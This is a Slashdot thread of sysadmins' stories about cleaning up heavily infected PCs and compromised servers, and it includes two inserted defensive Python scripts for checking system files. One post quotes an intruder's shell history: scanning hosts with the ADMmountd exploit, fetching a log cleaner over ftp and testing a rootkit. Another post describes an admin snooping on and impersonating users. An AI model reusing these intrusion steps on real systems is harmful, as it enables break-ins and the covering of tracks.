Worst Security Clean-Up You've Performed?
nakhla writes "Last night, I was tasked (by my wife) to help fix her friend's computer. It is a Windows XP home system which has been running slowly, almost to the point of unusability (like *that's* never happened before). It turns out that hundreds of random processes had filled up its meager 256 MB of RAM. The cause? Nearly 7,500 viruses and worms that had infected the system. That number doesn't even include the hundreds of spyware and adware programs that had installed themselves, as well. Although the box is now behind a firewall, that wasn't always the case. This was, by far, the most infected system I'd ever seen, but I'm sure it can't be the worst ever. What was the worst security cleanup you ever had to perform?"
Well, there was that one time... (Score:5, Funny)
Re: (Score:3, Funny)
A friend of mine had that same thing happen once, it started to infect other machines around it; we had to nuke the site from orbit... it was the only way to be sure...
Re: (Score:2)
Did you salt the earth so nothing would grow there again?
AOL CDs are better than salt for that! (Score:2)
We found that sowing AOL CDs instead of salt was the most cost-effective solution.
You Cleaned it Up? (Score:5, Insightful)
Hell, I do a reinstall if I get even 1 bad virus...
Re: (Score:2)
Re: (Score:2)
I had one machine that a friend needed cleaned up. If I left the explorer shell running, it would lock up after 90 sec. (once it got logged in). I had to kill the shell immediately.
I managed to reinstall the network stack and drivers and load Firefox from my USB key. 2 spyware scanners failed to even load and the 3rd counted 7000 infected registry keys before it locked up. The task list of running programs was huge and they were all fi
Re: (Score:2)
Usually if you know enough about Windows and the way the viruses/malware attack the OS you CAN clean it all off; it is a matter of how much time you want to spend cleaning it vs. how much time it would take to re-install the OS and programs/restore files...
My cut-off point is about 3 hours. This is also why I like to make Ghost images of the OS after a fresh install and patch job; that way you cut down your time considerably for the next clean (
Re:You Cleaned it Up? (Score:5, Interesting)
The machine was about a year old (and out of warranty, of course) - a 2.6 gig CPU with a gig of RAM. It took almost 35 minutes to go from power off to the desktop. They had an antivirus that came with the machine, but the "free 90 day subscription" to it had run out long ago and they weren't aware of it, since that was one of the first things the malware went after. Their 16 year old son who loved to surf porn all the time didn't help matters. A machine like that really isn't worth the time to hunt and peck for individual pieces of malware and should be wiped clean and started fresh; however, the godawful shit that was on it even hosed the recovery partition. And since actual install media isn't included with a $MAJORMANUFACTURER machine, they would have had to shell out for a retail copy of their previous OS.
Since these folks were obviously pretty clueless about computers, I fired up a Knoppix CD for them to see how they took to it. They honestly had zero problems navigating the KDE desktop and were able to do everything they wanted with the computer, except obviously to save stuff.
They now have a shiny Debian Etch based KDE desktop that they're enjoying, free of viruses, malware, and calls from the ISP.
That was one of the worst I've ever seen.
I WANT THAT ISP!!!!! (Score:2)
I'm getting DNS poisoning attacks about 300 times a day from a RR.COM cable modem address and RR says they can't do anything about it.
The attacks aren't actually working, but it still peeves me mightily.
Re: (Score:2)
Re: (Score:2)
Of course they CAN do something about it, they just choose not to; something about profit margins, I'm sure...
My ISP called me recently :-( (Score:2)
20k (Score:1)
Re: (Score:2)
Ewido came up with a final score of 16553.
Took quite a long time to clean up.
Re: (Score:2, Funny)
P.S.: Anyone else see the humor in that this "Ask Slashdot" was posted right after the "Vista doesn't need Anti-virus" story?
...I'm just sayin'
A Corrupted SQL Server System (Score:3, Interesting)
Re: (Score:2)
A few gems. (Score:5, Interesting)
Geek Squad. One customer had 35,000 pieces of spyware and over 3000 instances of some 30 or 40 viruses on her computer, some of which required some alternative methods to remove since they were locked when in safe mode and encrypted so you couldn't scan with a boot CD. After 4 scans taking about 6 hours I managed to get the spyware gone, and also in between had made note of viruses I needed to manually purge. Cleaned it up nice; meanwhile my supervisor was telling me to call the customer and tell them we needed to just reinstall Windows.
My aunt got AOL with anti-spyware and firewall and security. Eventually she had 35 different viruses, managed to remove all but 28 unique signatures (this was before I developed my brute-force removal method). Chucked a ton of spyware too.
While at WhiteWolf Security, we had a little game going; eventually our opponents got pissed at us for unrelated reasons and decided to physically break into WhiteWolf at 4am. They shorted CMOS pins and used boot CDs to evade password lock-outs, adding extra administrative accounts and rootkits that continuously gave them remote log-ins. We couldn't feasibly assess the damage and determine all the changes; I filed an incident report with cost of infinite and put the machine in the evidence locker for forensics to deal with. We got third place too.
Re: (Score:2)
Of course, eventually spyware will take its toll again, and the vicious cycle repeats.
Re: (Score:2)
With Geek Squad you don't pay hourly. They do the service. For a Spyware removal it's $30, virus removal is ANOTHER $30 (...), then once you've removed all that if there's a problem you can just use the Windows install CD to REPAIR the system for another $20 (this includes Windows update). If they don't remove anything, they don't refund your money; but they will charge you $70 to back up any files and $60 to reinstall Windows, plus $30 per application to install any software you need back (Office, anti
I hate thinking about this one... (Score:5, Interesting)
I realized at that point that it wasn't worth cleaning it up, so I reinstalled with her manufacturer's restore disk and rescanned it.
I did the old woman a favor and installed my old unused retail copy of Win98 on the box.
That's why you should never buy a computer from Rent-A-Center... *shudder*
Vomit (Score:5, Funny)
The worst? (Score:5, Funny)
web content file audits (Score:1)
XP, 128 megs... (Score:5, Insightful)
It was a mess, a real mess.
5 minutes starting XP, 2 minutes seeing the window of Internet Explorer appear. 10-15 minutes to be able to download Spybot and AVG. 3 hours running spybot (you read me right).
The hard drive stayed constantly ON during all that time. Then I said Screw That, and I reinstalled.
My conclusions after 3 hours:
- The first and biggest threat all the newbie users have on their computer are OUTDATED Norton utilities giveaways they got with their machine. They THINK they are protected, but they closed the "renew" window so often they forgot it's there. Either the software is FREE AND CONTINUOUS, or it's not there, capiche? AVG is excellent, there are many other free ones too... just find one and be happy. Not something that's NOT free.
- The second biggest threat are Norton Security Centers, again outdated, again with useless popups. Again with people finding it nagging and deactivating it, making certain not only that the Windows Firewall is properly deactivated by Norton's presence, but that their system is totally, uselessly unprotected. Very great, coming from a security company. Again, there are many FREE (beer) software packages that do spyware detection and stuff, and Windows Firewall, in all its eloquence, is still better than a kick in the butt, at least compared to the useless deactivated software I found.
Not that I hate Norton, that is.
Then, even if you got years of pro experience in computers, people trust only one person, and if it's not you, you're d00med. I have been explaining to them their meager 128 megs of memory was not enough.... to no avail, they wanted to change computers, almost bought a new one, then another member of my family told them the exact same thing I did, now they have 512 megs and it's screaming. "told you so" was the only answer I could say. Oh well.
Re: (Score:2)
Uh.. no. The first and biggest threat all the newbie users have on their computer is whatever application they're using, which is downloading and executing viruses! Viruses don't "just happen", even with a very naive user; viruses only happen if some application designer goes to the extra trouble to support them by giving them a "click here to run virus" GUI.
An
Re: (Score:2)
Re: (Score:2)
This kind of thing really upsets me, because no matter how much you try to educate people, someone is going to click it and then bang, another exploit is launched. It shouldn't have been so easy for a system to be compromised, but it is. Maybe Vista will solve this, but wasn't the same said of XP?
Norton must die! (Score:1)
Having said that, a large proportion of these systems had some form of Norton AV installed, and EVERY SINGLE ONE had a virus subscription which had lapsed. Entirely useless in protecting those computers.
HOW did you clean it up? (Score:4, Interesting)
But, I must ask, how on earth do you guys perform these kinds of clean-ups?
Most spyware that I have seen in the last months are rootkits. They hide underneath the kernel, are impossible to delete and "reinject" themselves upon reboot. I've even seen spyware which injects malicious code and/or replaces the main Windows binaries (explorer.exe, taskmgr.exe, cmd.exe, notepad.exe, etc.) How would you deal with these buggers?
When I come to a spywared computer, I start by running Spybot, AdAware and then AVG AntiVirus (to check for viruses/trojans). I would say that this technique is successful about 50% of the time. If it's not, I consider the situation disastrous and ask the person to do backups and go for a reformat.
I've even touched computers which froze upon startup (Windows boots up and everything freezes up). What would you do in these cases? I boot a live CD to do backups of a drive before the reformat.
So once again, Slashdotters, how do you guys get rid of these nasty rootkits and evolved spyware which can hide very well, without reformatting?
Re: (Score:3, Insightful)
Nobody can completely clean a virus infected system. The ones that claim they did, didn't, but don't know enough about the subject to know they didn't.
To put it bluntly, computer security is like virginity. You either are or you aren't. If somehow, at any time, an "evil" binary ran on your system, then the system may be in control of whoever wrote that binary in any number of ways.
Re:HOW did you clean it up? (Score:4, Informative)
You don't. It is not worth the time and effort unless your personal / professional time has zero value. Get your data off and reinstall / restore from image.
Otherwise (if you are getting paid well for it) you can boot off a live CD or install the drive as a second in another system (one that has all the autorun crap disabled), run AV/AS(pyware) on the drive, edit the registry removing all the startup items that you know aren't needed, run md5 comparisons on all the system files, and go from there. Dumping the registry and comparing with a known good registry is helpful at spotting crap.
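An added example (not code from any poster here) of the "hash comparison of all the system files" step above: the suspect drive and a known-good tree (a clean install of the same version, or a pre-infection Ghost image, mounted read-only) are both walked and their hashes diffed. It assumes both trees are mounted on the machine running the script and uses SHA-256 rather than MD5; the `demo()` trees are constructed sample data.

```python
import hashlib
import os
import tempfile

# Added example: offline file-hash comparison of a suspect drive against a
# known-good tree. Assumes both are mounted as directories on the live CD /
# second machine doing the cleanup; nothing on the suspect disk is executed.

CHUNK = 1 << 16


def hash_file(path):
    """SHA-256 of one file, streamed so big binaries do not fill RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map relative POSIX-style path -> SHA-256 for every regular file under root.
    Symlinks are skipped: hashing a link's target says nothing about whether the
    link itself was re-pointed at something else."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = hash_file(full)
    return manifest


def compare(known_good, suspect):
    """Split the suspect tree into modified (same path, different hash),
    missing (present in the clean tree only) and added (suspect only) files.
    'added' is where droppers and renamed binaries show up; 'modified' is
    where replaced system files (explorer.exe, cmd.exe, ...) show up."""
    modified = sorted(p for p in known_good
                      if p in suspect and suspect[p] != known_good[p])
    missing = sorted(p for p in known_good if p not in suspect)
    added = sorted(p for p in suspect if p not in known_good)
    return {"modified": modified, "missing": missing, "added": added}


def _write_tree(root, files):
    """Write a {relative path: bytes} dict under root (for the constructed demo)."""
    for rel, data in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(data)


def demo():
    """Constructed sample trees standing in for a clean install and an
    infected drive: one system binary patched, one deleted, one dropper added."""
    clean = {
        "WINDOWS/explorer.exe": b"explorer v1",
        "WINDOWS/system32/cmd.exe": b"cmd v1",
        "WINDOWS/notepad.exe": b"notepad v1",
    }
    infected = dict(clean)
    infected["WINDOWS/explorer.exe"] = b"explorer v1 + injected code"
    del infected["WINDOWS/notepad.exe"]
    infected["WINDOWS/system32/dropper.exe"] = b"constructed sample, not a real file"
    with tempfile.TemporaryDirectory() as good, tempfile.TemporaryDirectory() as bad:
        _write_tree(good, clean)
        _write_tree(bad, infected)
        return compare(build_manifest(good), build_manifest(bad))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```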
Re: (Score:2)
1) Like most people, I typically run an Antivirus application, Ad-Aware and Spybot SD to see what sort of spyware I can remove. I disable network access as well, so the software cannot re-download itself or other malware. Most of w
Re: (Score:2)
Re:You Cleaned it Up? (Score:1)
Next time I reinstall Windows I'm going to Ghost the drive once I've got set up how I like it.
Good Ol' SunOS (Score:5, Interesting)
When I took over the machine I started lobbying the boss to let me do some security work on it and he'd never let me do it. We gave users FULL SHELL ACCESS. Compilers included. Oh, and SunOS didn't even have shadow passwords by default!
Anyway, a few months into that someone changed the MOTD to some racist statement. That's when the boss finally let me do stuff.
But he wouldn't let me reinstall the thing. OR take shell-access away.
It was a constant battle. Every day I'd show up and look for what they did TODAY, and fix it. I'd just try to stay ahead of them, and they tried to stay ahead of me...
Sometimes I'd stay up at night and ttysnoop on them talking to their other friends on IRC. Then I'd SIGSEGV their IRC client, and watch them log back on and complain about how the sysadmin can't even keep IRC from segfaulting randomly. Then I'd take over their terminal and start saying crap about the other people he was talking to, until his friends kickbanned the hell out of him. Haha.
I eventually managed to get the boss to allow me to replace the shell with a restricted shell (ok, a shell replacement I wrote in Perl - it was easier than reading the manpage for rksh).
So basically the point was to make it not worth their while to break into my server.
Eventually this kid started DOSing us. We had a small 64K line to the 'real' internet, and he was on a DS3 in some university in Sweden. Our uplink (UUnet) said they couldn't do anything. Yay. So one day my boss (not the big boss) goes "hey, didn't you say they brag about this stuff on IRC?" I said "Yeah" and he goes "Teach me how to use IRC!!!"
The guy figured out IRC, found some 'hacker' channels, and FOUND THE GUY who was bragging about DOSing us. Started talking to him, getting kinda friendly. Guy starts blackmailing us - said that unless we gave him a machine with his own hard drive (he demanded at least 4 gigs) he'd DOS us again. So we gave it to him to see what he'd do. He filled it up with warez (gah) fairly fast, and then had to download it all with a 28.8K modem...
So my boss goes "Hey... why don't you come in and bring a hard drive and we'll copy it for you?"
And the guy did it. He came into our office. Where I had an IndyCam set up for him. And where we had a PI waiting outside to follow him home. And of course he brought his hard drive, which we copied everything off, including his master host/password list.
The kid was 15, so we couldn't sue him or anything. But we did get a LOT of info about him. My boss basically went through all the guy's hosts and nuked them or, if they seemed legit, changed his passwords and emailed the admins. And some of these were machines belonging to some pretty big cracker/hacker/whatever rings. We nuked those, too.
I like to think that was a pretty good security clean-up. We got rid of a LOT of bad-guy hangouts at that point.
Oh, and I was no longer with that company, but when that kid turned 18, they got him thrown in jail. That was fun, too.
Re: (Score:2)
Remember, this was 10 years ago. And not in the US.
Re: (Score:2)
Re: (Score:2)
You could be correct, of course, but I didn't interpret it the same as you.
Re: (Score:2)
I had a Bachelor's degree before my 19th birthday.
Real Player (Score:5, Funny)
I once tried to uninstall Real Player, but I was not successful so I guess it does not count.
You're probably not looking for this one (Score:3, Interesting)
My last encounter with a virus was when my brother (who had been abroad) came home, and a few days later I got an email from him with an executable in it. I downloaded the executable and found
Seriously. I didn't even have the free version of Ad-Aware installed until late 2004, and when I ran it I had lots of tracking cookies... that was all.
I do heavy development in Visual Studio, but only for consulting work. The rest I do in Linux. I've never had a problem. I admin lots of systems, and I've seen rootkits on Solaris, but I've been lucky so far with all the Linux servers I've looked at.
It's possible some of my mistakes weren't discovered until much later and no one bothered to tell me. But my own workstation has never been exploited. Sorry, hate to disappoint everyone, but I have nothing to tell.
Linux slapper was my worst (Score:1)
Was it running Vista? (Score:1, Offtopic)
This one time... (Score:1)
Re: (Score:2)
Seriously, ATHF is sometimes great and that is one of my favorite episodes.
W32.CIH (Score:1)
Comment removed (Score:5, Interesting)
Re: (Score:2)
The woman who wanted in-house service. (Score:5, Funny)
Re: (Score:2)
Didn't I see this story in a Jenna Jameson flick once?
Re: HOW did you clean it up? (Score:2)
I try all the good software... multiple times
Mostly, it depends on the usage.
In a company, with properly cared-for computers and a correctly controlled environment... not a horrible control, only a minimal one, like telling people illegal things mean losing their jobs, and non-job-related stuff is to be kept to a relative minimum (and no real enforcing o
Here's my toolkit... (Score:2, Informative)
I've been working in the small shop/repair business for over 5 years, and it's a weekly experience to get a machine in with thousands of trojans, viruses and spy apps. In cases where a re-install may not be desirable or feasible, here's a list of the tools we use to find, isolate and eradicate hostile software.
Disclaimer: I do not work for any of these companies, nor have I been paid anything by them. I just find that these tools work. Your mileage may vary.
1: Antivirus
A
Chernobyl (Score:3, Interesting)
Re: (Score:2)
Re: (Score:2)
On April 26th a few years ago, a dental office I did work for called up saying they were having trouble booting their server. While trying to figure this out over the phone, the manager said, "Oh, by the way, we're having some problems with the 5 client machines."
Bing! Red flag. I googled on "virus April 26" and found Chernobyl. I told her there was a good chance the machines were toast.
Good outcome, though. The manager was anal about backing up their patient database (quite a l
Re: (Score:2)
I think, too, that too many inst
Sendmail, spam relay, posted AC for obvious reason (Score:2, Interesting)
I get on the horn the folks in the IT department. "Yo, d00dz, we finally got pwn3d."
"Not our problem."
"No, really. The reason the box is so slow is because we've run an open relay for (censored) months, and this dude from a (censo
remote linux reinstall, over dialup, from a mac (Score:2)
I used to run a server on the campus of a university.
Winter rolls around, and I left the university for winter break.
While travelling around, I got a call that indicated the server was sending a lot of mysterious traffic across the internet and "they" had unplugged it.
Well, that's not good...
Apparently I was the victim of a sendmail exploit. Alas. What can be done?
I had to call and direct the reinstallation of Redhat 4.2 remotely through the hands of a geology grad student until it was on the internet, then
tops me (Score:2)
Saddam Virus back in the early nineties (Score:2)
Re: (Score:2)
pffft (Score:2)
*adds a couple more pens to his pocket protector*
I cleaned it with dental floss and belly button lint.
Re: (Score:2)
Re: (Score:2)
Articles like this are great resources for information and in this case cleaning methods.
We are here to learn from each other and share "war" stories.
Re: (Score:2)
Re: (Score:2)
some war stories (Score:5, Interesting)
I've dealt with some nasty cases on Linux though. Be forewarned, a lot of the twitchy sysadmin types who believe in the "proper" way of doing things are going to be driven crazy by what follows.
Story 1: A visitor to my house needed to use ftp (ftp something TO me, for obscure reasons I have forgotten), and I temporarily turned on the ftp server on my Redhat 6.1 box on my cable modem. Later I noticed the machine running slow and a stuck process with a disguised name; grepping strings on the executable showed it to be an IRC server with built-in commands that would DDOS people. Examination of logs showed I was cracked within three hours of turning that ftp server on. I was running Tripwire, so I had a daily email showing what files had changed, but I had not been updating Tripwire much, so I had to dig through lengthy lists to find out what new files had arrived and remove them. The computer that hacked mine was another RH 6.1 on a DSL in California, that was serving up web pages of pictures of salvage autos from a junkyard, all in Spanish. I did not bother to contact them.
Story 2: About three years later, when RH 6.1 was pretty old, I was working for a guy who had a few remote RH 6.1 servers at his customers' sites around the country. They never connected to the internet, we dialed into them on the modem, thus no security worries, right? Well, we had to make them dial out to an ISP and email us the IP address, because they changed their phone system and we temporarily couldn't dial into the remote machine, and that got cracked within a few hours. Examination of a few clues, which I have forgotten, led me to conclude it had an Aurora rootkit on it, which is a kernel module that the kernel reads in on bootup, that then filters all your ls and lsof and other commands to stop you from finding it or removing it. The solution I came up with was to go to an identical machine and compile an identical kernel, except with all modules built in and the ability to load modules turned off. The decision was made to make them mail us the hard drive back and we mailed them a replacement before I got to try it.
Story 3: a Debian server a different, later employer used was the NATing gateway, mail server, file server, essentially everything for a very small office. The boss-man either connected to it from an infested public terminal at a university, or it was brute-force ssh'd, not sure. It was compromised, and not noticed for months because the guy never did anything (this was confirmed by going back through backups and checking for when the key files appeared). I noticed it when I discovered I couldn't update something because someone had used chattr to make the file immutable, and of course that file was a trojan (it took me a while to figure that out). I booted up with a live CD to make sure no Aurora type rootkit was interfering with my access, and searched the entire disk for every immutable file (using lsattr and grep), and then hand-replaced the binaries used by apt-get and dpkg and friends, and then chrooted to the disk and did "apt-get --reinstall install packagename" for every compromised binary. I got the package name from "dpkg -S
I discovered a "hidden" directory (named with a single space character) that had tools to make random searches on yahoo and scrape the resulting pages for email addresses, and the spam had links to a fake bank login page, and the stuff to host that page was also there. As far as I could tell it was never unpacked and run. It was in a tar.gz with a script to unpack it and set it all up automatically.
He was running a package of two or three cobbled together sniffers and a compromised ssh
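The immutable-file hunt from Story 3, as an added example that is not the poster's own script: it parses `lsattr -R` output for the lowercase `i` flag, asks the suspect disk's own package database (via `dpkg --admindir`, run from the live CD so none of the suspect's binaries execute) which package owns each file, and emits the `chattr -i` plus `chroot ... apt-get --reinstall install` commands to review. `MOUNT`, the sample lsattr text and `fake_run` are constructed assumptions; files nobody packaged (such as the single-space directory from the post) are listed separately since no package can reinstall them.

```python
import re
import shlex
import subprocess

# Added example: triage immutable files on a suspect Debian root mounted
# read-only from a live CD. MOUNT is an assumed mount point.
MOUNT = "/mnt/suspect"

# `lsattr -R` lines look like "----i--------e-- ./bin/ls"; directory headers
# ("./bin:") and error lines have no flag field and are skipped.
ATTR_LINE = re.compile(r"^([-A-Za-z]+)\s+(\S.*)$")


def immutable_paths(lsattr_output):
    """Paths whose flag field contains lowercase 'i' (immutable).
    Uppercase 'I' means an htree-indexed directory, not immutable."""
    found = []
    for line in lsattr_output.splitlines():
        m = ATTR_LINE.match(line.strip())
        if m and "i" in m.group(1):
            found.append(m.group(2))
    return found


def parse_dpkg_s(output):
    """Parse `dpkg -S` output ("pkg1, pkg2: /path") into package names,
    ignoring "diversion by ..." lines."""
    for line in output.splitlines():
        if line.startswith("diversion") or ": " not in line:
            continue
        pkgs, _path = line.split(": ", 1)
        return [p.strip() for p in pkgs.split(",")]
    return []


def run(cmd):
    """Real runner: (exit code, stdout) of a command on the live CD."""
    r = subprocess.run(cmd, capture_output=True, text=True)
    return r.returncode, r.stdout


def plan_reinstalls(lsattr_output, run_cmd=run):
    """Map each immutable file to the package that shipped it, using the
    suspect disk's dpkg database rather than its (possibly trojaned) dpkg."""
    plan = {"reinstall": {}, "not_packaged": []}
    for rel in immutable_paths(lsattr_output):
        path = "/" + rel[2:] if rel.startswith("./") else rel
        rc, out = run_cmd(["dpkg", "--admindir=" + MOUNT + "/var/lib/dpkg",
                           "-S", path])
        pkgs = parse_dpkg_s(out) if rc == 0 else []
        if not pkgs:
            plan["not_packaged"].append(path)
        for pkg in pkgs:
            plan["reinstall"].setdefault(pkg, []).append(path)
    return plan


def reinstall_commands(plan):
    """Commands to review before running. The immutable bit must come off
    first, because dpkg replaces files by rename, which fails on them.
    As in the post, apt-get/dpkg on the disk are hand-replaced before this."""
    cmds = []
    paths = sorted(p for ps in plan["reinstall"].values() for p in ps)
    if paths:
        cmds.append("chattr -i " + " ".join(shlex.quote(MOUNT + p) for p in paths))
    for pkg in sorted(plan["reinstall"]):
        cmds.append("chroot %s apt-get --reinstall install %s"
                    % (shlex.quote(MOUNT), shlex.quote(pkg)))
    return cmds


# Constructed sample output, standing in for `cd MOUNT && lsattr -R .`
SAMPLE_LSATTR = """./bin:
-------------e-- ./bin/bash
----i--------e-- ./bin/ls
./usr/sbin:
----i--------e-- ./usr/sbin/sshd
./var/tmp/ :
----i--------e-- ./var/tmp/ /tidy
lsattr: Operation not supported While reading flags on ./proc
"""

FAKE_DPKG = {"/bin/ls": (0, "coreutils: /bin/ls\n"),
             "/usr/sbin/sshd": (0, "openssh-server: /usr/sbin/sshd\n")}


def fake_run(cmd):
    """Stand-in for dpkg so the plan can be exercised without a Debian disk."""
    return FAKE_DPKG.get(cmd[-1], (1, ""))


if __name__ == "__main__":
    for c in reinstall_commands(plan_reinstalls(SAMPLE_LSATTR, fake_run)):
        print(c)
```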
just finished recently (Score:5, Funny)
Re: (Score:2)
Re: (Score:2)
PHBs (Score:2)
Re: (Score:2)
1) nuke from orbit and
2) reinstall from known free sources (NO spy/adware supported items).
I think you mean to say:
1) Take off
2) Nuke the site from orbit
It's the only way to be sure.
I would've tried that, but I don't have any backups to restore the good stuff. Plus I'm rather short on the nukes, and the transport to orbit. Heck, I don't even have a Caterpillar Power Loa
A pretty bad one (Score:2, Interesting)
Found out the disk had 5k of space left on it. Checked and there was no antivirus, firewall or antimalware installed and it had been directly connected to a broadband line with an ADSL modem for the last 3 months. And t
My worst... (Score:5, Interesting)
As I soon found out the broadband company had cut them off, since the computer was a breeding ground for viruses and spam of all sorts. Why did they have so many problems, you ask? This is what I found.
No hardware firewall, one computer directly accessing the internet on a (albeit slow) broadband connection, no software firewall, no anti-virus program, no adware-removal program, Outlook Express and (actually!) a really old version of Firefox (0.3 I believe), all of it running on an unpatched version of Windows 98A.
It took me some time to clean that one out.
But it did impress me somewhat that the broadband company (Telia, Sweden) actually demanded proof that they had installed both anti-virus and a firewall before they reactivated the connection. That is surprisingly good ethics for such a company, although it might be considered pure survival tactics, as the internet climate is today.
Re: (Score:2)
Re: HOW did you clean it up? (Score:3, Informative)
I know what I'll do next time.
Photocopy sorting nightmare (Score:3, Funny)
At the university I once had the job to produce 100 copies of a circa 100 page application document for a very important government funded research project.
I had a high-performance copier, to which I fed the original pages, cranked the lever to 100 copies and kept shoveling paper into it until it finished.
Only then I realized that I misunderstood the sort/collate switch and ended up with 10,000 sorted pages, meaning that 100 pages #1 were followed by 100 pages #2 etc.
I was out of fresh paper for a retry, too.
After some decent swearing and a couple of cigarettes, I arranged the tables of a seminar room around myself, then spent the whole night making 100 stacks of paper one by one.
When it was over, the skin on my fingers was so dry that it cracked and started bleeding. Not to speak of the over-exercised muscles in my hands...
Re: (Score:2)
Maybe anyway...
Bug Spray (Score:4, Funny)
Back in about 1993 (Score:3, Funny)
My PC is virus-free too, probably because it doesn't have a network card or modem, a surprisingly difficult combination to achieve when buying it. I gave up trying to spec a machine without ethernet and settled for opening up a brand new computer, pulling the unwanted card and binning it.
Re: Exchange, Outlook and Klez (Score:2)
IIRC that was SOP because there were some settings in Exchange that only a locally installed Outlook client could access. Now, I don't know if your admin actually needed to access any of those settings...
Slightly on-topic (Score:3, Interesting)
* An Excel spreadsheet showing the expenses for a French shoe manufacturer
* Someone's thesis on the spawning habits of Canadian salmon (quite well written too, best of luck with the masters)
* A strange photograph of a person driving a car with a giant carrot for a passenger
* Someones 10Mb
* No porn whatsoever, disappointing
* And no password files, which I guess would have been a good primary target for the trojan.
Quality trojan, they don't write them like that anymore.
Script Kiddie Hunt (Score:3, Informative)
It was pretty good about cleaning up after its last logs, but I finally managed to stumble into the kiddie's home dir on my box... the damned kiddie forgot to clean up his
Looking at that (also Redhat 5.x) server's web site, I noticed that it had some evil users who exposed
So I cleaned up some other computer as well as mine. That was pretty much the time I migrated to Debian for good... haven't had nary a problem before or since.
Anyway, here are some annotated excerpts from the
blksheep/.bash_history
cd
cd
ls
ADMmountd liuxcentral.com -t 0 # plenty of typos while "scanning" for vulnerable hosts
ADMmountd linuxcentral.com -t 0
ADMmountd www.mondenet.com -t 0
# retrieving the logfile cleaning utility, which didn't work on
ftp goethe.sbu.edu
mv utclean.wri utclean.c
gcc utclean.c -o utlcean
mv utlcean
mv utlcean utclean
chmod +x utclean
# Testing his rootkit
who
ls
screen find / -name
ls
cat blah
rm blah
cat
Re: (Score:2)
Everyone knows Linux is invulnerable to attack!
You must be some kind of weird antimatter slashdot troll from the negativerse where the sky is white and the stars burn with the blackness of a thousand really really black things.
Wow (Score:2)
Well... (Score:3, Funny)
Just wipe it. Trust me (shudder), a boy should never see that side of his mom.
That was no doubt the worst cleanup I ever had to do.
Um, not quite.. (Score:2)
Re: (Score:2)
Vista and Allchin (Score:2, Funny)
6500+ infections (Score:2)
But probably the scariest was one I cleaned with 350 infections of one virus. I believe it was Chernobyl, but I might be wrong. On a certain date of the month it detonated, wiping the drive. I used it on the day before until around 11:55pm unknowingly and went to bed around midnight. I found it the day after it
Calling Sweden... (Score:2, Interesting)
Not the "worst" infection I've ever cleaned up, but certainly the weirdest!
Not as bad as it could have been, I guess (Score:2)
I thought it was some kind of record. But reading other posts, I guess it isn't.
Old times (Score:2)
I remember that a few computer shops put out public computers to attract customers. These computers worked like this - you went to the shop with a few floppies and copied games/software (mostly games) from and int
Two Words: (Score:2)
Blew up the whole data center. Oh, and asshats let the support on Netbackup lapse, so the restores wouldn't run until they fixed whatever problem they had. But they couldn't get support to help them until they got the CIO out of bed to sign a $250k PO for licensing and support.
All this happened because they didn't pay the invoice for ISS, and didn't get the Black Ice patch installed quickly enough.
Funny... I have severe asthma, and this was just the day they decided to paint the inside
Holy hell! (Score:2)
The worst I've seen is approximately 3500 spyware on a 1GHz Win2k machine with 512M RAM. It was SLOW. Like 15+ minutes to boot, slow. It took a good 5 hours to "clean" with Ad-Aware, and even then I decided to reinstall anyway due to the system retaining a great deal of instability.
Re: (Score:2)
You also have to factor in the time to backu
Cleanup method of the future (Score:2)
I think there's a third approach coming up, though it will be a few years before it's widespread. It's a variation on the first approach.
A quick summary: recopy the one Xen DomU image of the subsystem that has been infected. If most of your applications are installed in other domains, then you don't need to reinstall them. Needless to say, each Microsoft application should have a whole DomU dedicated to it. Maybe even have it run a freshly-copied image anytime the user clicks on the icon that starts it
Re: (Score:2)